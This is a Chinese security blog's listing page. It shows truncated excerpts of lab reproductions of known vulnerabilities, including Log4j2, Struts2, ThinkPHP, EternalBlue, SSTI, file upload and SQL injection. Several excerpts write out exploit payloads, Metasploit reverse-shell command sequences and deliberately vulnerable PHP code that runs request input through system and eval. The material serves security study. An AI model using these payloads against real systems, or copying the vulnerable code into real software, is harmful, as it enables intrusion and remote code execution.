- 博客(102)
- 收藏
- 关注
RSS订阅原创 log4j2-rce漏洞复现(CVE-2021-44228)
漏洞介绍Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1)漏洞编号:CVE-2021-44228漏洞复现利用vulfocus搭建并启动靶场DNSLog验证通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
2022-04-01 14:41:48
2233
1
原创 SSTI服务端模板注入漏洞
漏洞复现利用vulhub搭建靶场环境docker-compose builddocker-compose up -d访问http://your-ip:8000/传入参数?name={{5*9}},可以得到如下结果,说明存在SSTI漏洞获取eval函数并执行任意python代码的POC:{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}.
2022-03-18 10:20:47
4390
1
原创 spring框架远程代码执行漏洞(CVE-2017-4971)
漏洞影响影响版本:Spring WebFlow 2.4.0 - 2.4.4漏洞复现搭建漏洞环境并访问点击左上角登录,使用左边给的用户名密码登录登录后访问 id=1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed”点击confirm时,进行抓包使用如下反弹shell的Payload&_(new+java.lang.ProcessBuilder("b.
2022-03-17 21:05:11
5552
原创 S2-053 远程代码执行漏洞
Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。漏洞详情漏洞编号:S2-053(CVE-2017-12611)漏洞影响:远程代码执行影响版本:Struts2.0.1 -- Struts 2.3.33, Struts 2.5 -- Struts 2.5.10漏洞复现使用docker搭建靶场,并启动访..
2022-03-17 19:57:54
364
原创 永恒之蓝(ms17-010)&&meterpreter模块简单使用
永恒之蓝(ms17-010)启动meterpretermsfconsole查询ms17-010,并使用攻击模块search ms17-010use 3设置目标ip,本机ip,payloadset rhosts 192.168.254.130set lhost 192.168.254.129set payload windows/x64/meterpreter/reverse_tcp查看配置show options开始攻击run...
2022-03-09 21:11:25
1427
原创 ms08-067 复现
进入meterpretermsfconsole进入ms08-067模块,并使用search ms08-067use 0设置攻击地址,本机地址,payloadset rhosts 192.168.254.133 (目标ip)set lhost 192.168.254.129 (本机ip)set payload generic/shell_reverse_tcp查看show options开始攻击run...
2022-03-09 19:19:16
158
原创 ThinkPHP5
ThinkPHP5 5.0.23 远程代码执行漏洞漏洞介绍ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响范围ThinkPHP 5.0系列 < 5.0.23漏洞复现靶场搭建后,访问地址F12进入HackBar中_method=__construct&filter[]=system&method
2022-03-08 20:57:31
3445
原创 Struts2 S2-061 远程代码执行漏洞 (CVE-2020-17530)
漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。影响版本Apache Struts 2.0.0 - 2.5.25漏洞复现搭建靶场,并访问验证漏洞是否存在http://47.106.102.84:31924/?i
2022-03-08 20:08:46
411
原创 DVWA暴力破解(high)
输入用户名,密码抓包发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder,设置两个参数 password和user_token为变量,攻击类型选择pitchfork设置线程为1,因为Recursive_Grep模式不支持多线程攻击设置token,并复制value值将Redirections设置为Always设置payload点击start attack攻击爆破,结果成功爆破,如下图所示...
2022-03-07 15:58:39
313
原创 Redis未授权访问
漏洞简介redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。漏洞影响版本Redis 4.x/5.0.5以前版本漏洞复现
2022-03-04 20:10:23
486
原创 Jenkins未授权访问
漏洞原因Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用)利用条件1.使用低版本的Jenkins,默认没有登录控制2.有登录控制,但配置文件中设置了不启用安全性(/var/lib/jenkins/config.xml 设置为false)3.控制台使用了弱密码漏洞复现登录到靶场登录 admin/admin系统管理>全局安全配置(低版本的Jenkins,默认没有登录控制,所以这里要修改)退出登录,系统管理>脚本命令..
2022-03-04 11:48:45
818
原创 zzcms 任意用户修改密码
任意用户修改密码方式一先注册个账号,然后首页点击找回密码这里还存在用户遍历,如果存在该用户,那么返回在前端页面的就是如下所述的正确的状态抓包,点击下一步将step1改为step2,放包即可跳过安全验证方式二点击下一步验证码随意注入,一定快速输入,不然会发包后端会做验证,在显示这样的红色警告字符之前点击下一步...
2022-03-03 19:56:59
284
原创 pikachu 越权漏洞
登录pikachu平台选择over permission水平越权点击提示,有三个用户选择lucy登录,点击查看个人信息在当前已登陆的lucy的个人信息页面,修改url里面的username,改为lili的用户名垂直越权点击提示,用超级管理员登录添加用户并使用burpsuite抓包将抓到的包放入repeater中,放行包,发现生成了一个a用户退出登录,使用普通用户登录,并获取cookie值 js7gjkfpolj0o17vpl...
2022-03-03 19:53:45
2603
原创 SSRF服务器端请求伪造
原理SSRF攻击的目标是从外网无法访问的内部系统,正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统;SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等SSRF危害可以对外网服务器所在内网、本地进行端口扫描,获取服务端口的Banner信息攻击运行在内网或本地的应用程序(如Fastcgi,redis等)对内网Web应用进行指纹识别,通过访问默认文件实
2022-03-02 16:20:18
531
原创 CSRF跨站请求伪造
原理一个CSRF漏洞攻击的实现,其需要由“三个部分”来构成1、有一个漏洞存在(无需验证、任意修改后台数据、新增请求);2、伪装数据操作请求的恶意链接或者页面;3、诱使用户主动访问或登录恶意链接,触发非法操作;1.DVWA-CSRF low登录dvwa靶场,调节安全级别为low,进入csrf模块输入新密码,并进行抓包构造恶意链接,让用户处于登录状态,去访问恶意url(发现修改成功)可以使用img标签进行,编写1.html,使其访问重新尝试登录,...
2022-03-02 15:38:52
220
原创 Apache SSI 远程命令执行漏洞复现
漏洞描述当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。漏洞范围2.4.0~2.4.29漏洞复现1.访问地址2.上
2022-03-01 20:04:52
278
原创 struts2 S2-046(cve_2017_5638)
漏洞介绍名称: struts2-046 远程代码执行 (CVE-2017-5638)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任
2022-03-01 19:25:25
456
原创 thinkphp-cnvd 2018 24942
影响范围ThinkPHP 5.0.全版本5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。漏洞复现1.访问地址2.远程代码执行?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd3.上传一句话木马?s=index/\think\tem
2022-03-01 17:26:22
758
原创 struts2 S2-057(CVE-2018-11776)
漏洞介绍该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行;url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行.受影响版本<=Struts2.3.34,Struts 2.5.16漏洞复现1.访问地址http://ip:port/strut..
2022-03-01 16:47:50
1170
原创 系统命令执行
允许系统命令执行的函数有system()exec()shell_exec()passthru()popen()反引号system()<?phpif(isset($_GET['a'])){ system($_GET['a']); }else{ echo "Please input a";}?>exec()<?phpif(isset($_GET['a'])){ echo exec($_GET['a']); }else{ .
2022-03-01 15:50:51
1149
原创 远程代码执行漏洞利用
PHP下,允许命令执行的函数有eval()assert()preg_replace()call_user_func()$a($b)eval()<?phpif(isset($_GET['a'])){ eval($_GET['a']); }else{ echo "Please input a";}?>assert()<?phpif(isset($_GET['a'])){ assert($_GET['a']); }else{ e
2022-03-01 15:23:49
413
原创 phpmyadmin 4.8.1(cve-2018-12613)
漏洞原理来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试1.登录phpmyadmin2.index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd3.查询<?php phpinfo();?>4.查看sessionid(cookie中phpMyAdmin的值)5.访问http://ip/?target=db_sql.php%253f..
2022-02-28 21:14:02
295
原创 CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315(2021.12)1.打开向日葵
2022-02-28 19:37:08
482
原创 文件 包含
概念把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。原理文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入1.本地文件包含(无视后缀)创建文件包含:include.php<?phpinclude("print.php");?>另创建print.php<?phpecho "hello world!!!";?
2022-02-28 16:51:14
662
原创 tomcat任意文件上传
环境搭建1.安装dockeryum -y install docker2.拉取vulfocus镜像docker pull vulfocus/vulfocus:latest3.运行vulfocusdocker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.254.128 vulfocus/vulfocus#如果端口被占用,则命令执行不成功(可以将80:80改为:10
2022-02-24 20:08:19
541
原创 upload-labs 1-5
1.Pass-01提交1.php,开启Burpsuite抓包发现没有产生流量就验证了修改前端代码这里调用后面的函数,直接删除,即可上传成功2.Pass-02提交1.php开启Burpsuite抓包将文件类型application/octet-data为image/jpeg,放行包即可3.Pass-03提交1.php黑名单检测,可将1.php修改为1.php3或1.php5进行绕过4.Pass-04提交1.php新...
2022-02-24 17:07:22
179
原创 文件上传与解析
1.客户端检测与绕过之删除浏览器事件调用 checkFile()函数,使其只能上传图片格式,将红框内删除即可2. 客户端检测与绕过之抓包修改后缀名将上传的文件末尾加上 .jpg ,开启Burspsuite抓包,抓到包之后,将 .jpg 删除,放行包即可3.后缀名检测与绕过之大小写绕过将脚本文件1.php更改为1.Php即可4.后缀名检测与绕过之名单列表绕过将脚本文件1.php更改为1.php3或者1.phtml,再次选择脚本文件5.后缀名检测与..
2022-02-22 21:01:31
888
原创 WAF绕过
实验原理WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行
2022-02-19 11:43:38
1994
原创 SQLMAP进阶使用 --tamper
实验原理tamper脚本是SQLMAP中用于绕过waf或应对网站过滤逻辑的脚本。SQLMA自带了一些tamper脚本,可以在 tamper目录下查看它们。用户也可以根据已有的tamper脚本来编写自己的tamper脚本(绕过逻辑)。1.查看Tamper文件-->sqlmap->tamper,选中space2comment.py文件,并打开(记事本也可以)这段代码为space2comment.py脚本文件的核心代码,其作用是将SQLMAP检测目标时所使用的payload..
2022-02-19 11:03:41
3593
原创 SQLMAP进阶使用 --cookie
实验原理Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。1.访问DVWA网站1)访问dvwa,并登录。admin password2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
2022-02-19 10:40:14
5977
1
原创 SQLMAP进阶使用 --technique -v
实验原理使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情
2022-02-19 10:08:07
5517
原创 SQLMAP基础使用 -r (GET或POST)
1.访问SQLi-Labs网站访问Less-4http://192.168.5.116/sqli-labs/Less-4/2.利用Burpsuite工具抓包1)启动Burpsuite并设置代理服务端口2)设置Firefox代理注意:端口要一致3)开启 Burpsuite的代理拦截功能4)利用Burpsuite工具拦截HTTP请求包在Firefox地址栏中给定一个GET参数,并访问http://192.168.5.116/sqli-labs/Less..
2022-02-18 21:13:27
3945
原创 SQLMAP基础使用 -u
1.访问SQLi-Labs网站访问Less-3,并根据网页提示给定一个GET参数http://127.0.0.1/sqli-labs/Less-3/?id=12.启动SQLMAP进入sqlmap目录,在搜索框输入cmd,并回车3.寻找注入点使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1"检测结果:4.获.
2022-02-18 20:47:25
455
原创 宽字节注入
1.访问SQLi-Labs网站访问Less-32,并根据网页提示给定一个GET参数2.寻找注入点http://127.0.0.1/sqli-labs/Less-32/?id=1'运行后正常显示用户名和密码,但页面下方提示 ' 前被加上了 \http://127.0.0.1/sqli-labs/Less-32/?id=1%df'运行后发生报错!http://127.0.0.1/sqli-labs/Less-32/?id=1%df' --+运行后正常显示..
2022-02-18 19:51:11
282
原创 二阶 注入
二阶注入与普通注入的区别:(1)普通SQL注入:1)发生在一个HTTP请求和响应中,对系统的攻击是立即执行的2)攻击者在 http请求中提交非法输入3)应用程序处理非法输入,使用非法输入构造SQL语句4)在攻击过程中向攻击者返回结果。(2)二阶SQL注入1)攻击者在 http 请求中提交某种经过构思的输入2)应用程序存储该恶意输入(通常保存在数据库中)以便后面使用并响应请求3)攻击者提交第二次(不同的)http请求4)为处理第二次http 请求,程序会检索存储在数据库
2022-02-18 19:02:57
588
原创 基于布尔的盲注
关于布尔盲注某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些sQL判断条件成立,通过此来获取数据库中的数据。一些功能函数的说明length(str):返回字符串(str)的长度,以字节为单位。substr(str,pos,len):从指定的位置( pos)开始,截取并返回字符串 ( str)指定长度(len)的子串。ascii(str):返回字符串( str)最左边字符的ASCll码。1.访问SQLi-
2022-02-18 17:56:45
774
原创 基于时间的盲注
关于时间(延时)盲注某些场合下,页面只有一种返回结果,使用具有延时功能的函数sleep()、benchmark()等,通过判断这些函数是否正常执行来获取数据库中的数据。一些功能函数的说明length(str):返回字符串(str)的长度,以字节为单位。substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定长度(len)的子串。ascii(str):返回字符串(str)最左边字符的ASCll码。if(expr1,expr2,expr3):条件判断函
2022-02-18 17:56:43
1277
原创 HTTP头部注入 --User-Agent
实验原理有时候,后台开发人员为了验证客户端HTTP Header (比如常用的Cookie验证等)或者通过HTTP Header头信息获取客户端的一些信息(比如 User-Agent、Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Header的注入漏洞。常见的HTTP Header注入类型包括Cookie注入、Referer注入、User-Agent注入、XFF注入等。1.访问SQLi-Labs网站访
2022-02-18 15:43:37
5125
原创 基于floor的报错注入
报错注入前提:(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上(2)后台未对一些具有报错功能的函数进行过滤常用的报错功能函数包括extractvalue()、updatexml)、floor()、exp()等报错原理:floor()函数与group by、rand()联用时,如果临时表中没有该主键,则在插入前会再计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中,导致主键重复报错,错误信息如:Duplicate entry
2022-02-18 14:45:09
1402
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人